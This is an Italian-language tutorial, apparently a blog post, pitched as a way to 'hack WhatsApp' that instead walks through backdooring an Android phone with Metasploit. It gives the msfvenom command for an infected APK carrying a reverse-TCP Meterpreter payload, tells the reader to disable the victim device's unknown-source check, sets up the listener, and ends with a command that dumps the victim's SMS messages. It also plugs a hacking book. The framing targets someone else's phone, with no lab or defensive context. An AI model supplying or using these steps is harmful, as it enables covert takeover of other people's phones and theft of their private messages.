Molti di voi hanno digitato questa frase su google per diversi motivi, ma il punto della questione è che non esistono metodi per hackerare whatsapp direttamente, ma è possibile farlo sfruttando altre vulnerabilità.
Per fare ciò, oggi sfrutteremo l'hacking di un cellulare tramite Metasploit.
PRIMA DI INIZIARE, VUOI SAPERNE DI PIU' SULL'HACKING?
TI CONSIGLIO UN LIBRO CHE TI PERMETTERA' DI IMPARARE QUESTA BELLISSIMA ARTE SENZA SEGUIRE TUTORIAL PASSO PER PASSO!
- 1) Creazione della backdoor
iniziamo a creare il nostro file apk infetto.infatti Metasploit mette a disposizione anche il modulo per la creazione di file apk. Digitiamo quindi da terminale o da msfconsole il seguente comando, che ci restituirà un file apk, pronto per essere scaricato e installato sul device vittima.
- msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] R > [nome_file].apk
Il payload è pronto, non ci resta che portarlo sul dispositivo mobile.
2)Impostare L'handler
Disattivato il controllo delle fonti sicure sul dispositivo, avviamo msfconsole con il comando msfconsole e impostiamo un handler generico per android
- msfconsole
- use exploit/multi/handler
- set PAYLOAD android/meterpreter/reverse_tcp
- set LHOST [ip_macchina_attaccante]
- set LPORT [porta_per_la_connessione]
3)Lanciare l'exploit e collegarsi al dispositivo
lanciamo il nostro exploit digitando
- exploit
e installiamo l'apk infetto sul dispositivo.
una volta fatto digitiamo
- sessions -l
- sessions -i [numero sessione]
- dump_sms